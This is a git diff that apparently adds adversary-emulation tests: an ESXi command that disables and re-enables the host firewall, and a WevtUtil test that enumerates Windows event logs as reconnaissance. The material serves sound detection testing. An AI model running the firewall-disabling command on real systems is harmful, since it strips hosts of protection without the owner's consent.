diff --git a/atomics/T1562.004/src/esxi_disable_firewall.txt b/atomics/T1562.004/src/esxi_disable_firewall.txt
new file mode 100644
index 00000000..b5b1bfb1
--- /dev/null
+++ b/atomics/T1562.004/src/esxi_disable_firewall.txt
@@ -0,0 +1 @@
+esxcli network firewall set --enabled false
diff --git a/atomics/T1562.004/src/esxi_enable_firewall.txt b/atomics/T1562.004/src/esxi_enable_firewall.txt
new file mode 100644
index 00000000..277d540e
--- /dev/null
+++ b/atomics/T1562.004/src/esxi_enable_firewall.txt
@@ -0,0 +1 @@
+esxcli network firewall set --enabled true
\ No newline at end of file
diff --git a/atomics/T1654/T1654.md b/atomics/T1654/T1654.md
index 44a7cfab..da649736 100644
--- a/atomics/T1654/T1654.md
+++ b/atomics/T1654/T1654.md
@@ -10,6 +10,8 @@ Adversaries may also target centralized logging infrastructure such as SIEMs. Lo
 
 - [Atomic Test #1 - Get-EventLog To Enumerate Windows Security Log](#atomic-test-1---get-eventlog-to-enumerate-windows-security-log)
 
+- [Atomic Test #2 - Enumerate Windows Security Log via WevtUtil](#atomic-test-2---enumerate-windows-security-log-via-wevtutil)
+
 
 <br/>
 
@@ -47,4 +49,37 @@ powershell -c "remove-item $env:temp\T1654_events.txt -ErrorAction Ignore"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Enumerate Windows Security Log via WevtUtil
+WevtUtil is a command line tool that can be utilised by adversaries to gather intelligence on a targeted Windows system's logging infrastructure. 
+
+By executing this command, malicious actors can enumerate all available event logs, including both default logs such as Application, Security, and System
+as well as any custom logs created by administrators. 
+
+This information provides valuable insight into the system's logging mechanisms, potentially allowing attackers to identify gaps or weaknesses in the logging configuration
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** fef0ace1-3550-4bf1-a075-9fea55a778dd
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+wevtutil enum-logs
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1654/T1654.yaml b/atomics/T1654/T1654.yaml
index 723bf0ee..4c672a01 100644
--- a/atomics/T1654/T1654.yaml
+++ b/atomics/T1654/T1654.yaml
@@ -17,3 +17,17 @@ atomic_tests:
     cleanup_command: powershell -c "remove-item $env:temp\T1654_events.txt -ErrorAction Ignore"
     name: powershell
     elevation_required: true
+- name: Enumerate Windows Security Log via WevtUtil
+  auto_generated_guid: fef0ace1-3550-4bf1-a075-9fea55a778dd
+  description: |- 
+    WevtUtil is a command line tool that can be utilised by adversaries to gather intelligence on a targeted Windows system's logging infrastructure. 
+  
+    By executing this command, malicious actors can enumerate all available event logs, including both default logs such as Application, Security, and System
+    as well as any custom logs created by administrators. 
+  
+    This information provides valuable insight into the system's logging mechanisms, potentially allowing attackers to identify gaps or weaknesses in the logging configuration
+  supported_platforms:
+  - windows
+  executor:
+    command: wevtutil enum-logs
+    name: command_prompt
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index df2704ee..456cece3 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -1561,3 +1561,23 @@ eea0a6c2-84e9-4e8c-a242-ac585d28d0d1
 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50
 6a5b2a50-d037-4879-bf01-43d4d6cbf73f
 4099086c-1470-4223-8085-8186e1ed5948
+b385996c-0e7d-4e27-95a4-aca046b119a7
+ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5
+940db09e-80b6-4dd0-8d4d-7764f89b47a8
+2d5029f0-ae20-446f-8811-e7511b58e8b6
+36c62584-d360-41d6-886f-d194654be7c2
+bac8a340-be64-4491-a0cc-0985cb227f5a
+fef0ace1-3550-4bf1-a075-9fea55a778dd
+8ce53049-5314-4279-b635-b69c5bed3a36
+f0287b58-f4bc-40f6-87eb-692e126e7f8f
+f1641ba9-919a-4323-b74f-33372333bf0e
+68254a85-aa42-4312-a695-38b7276307f8
+a9b93f17-31cb-435d-a462-5e838a2a6026
+3b0df731-030c-4768-b492-2a3216d90e53
+424e18fd-48b8-4201-8d3a-bf591523a686
+f095e373-b936-4eb4-8d22-f47ccbfbe64a
+b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+c7921449-8b62-4c4d-8a83-d9281ac0190b
+04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+1329d5ab-e10e-4e5e-93d1-4d907eb656e5
+95f5c72f-6dfe-45f3-a8c1-d8faa07176fa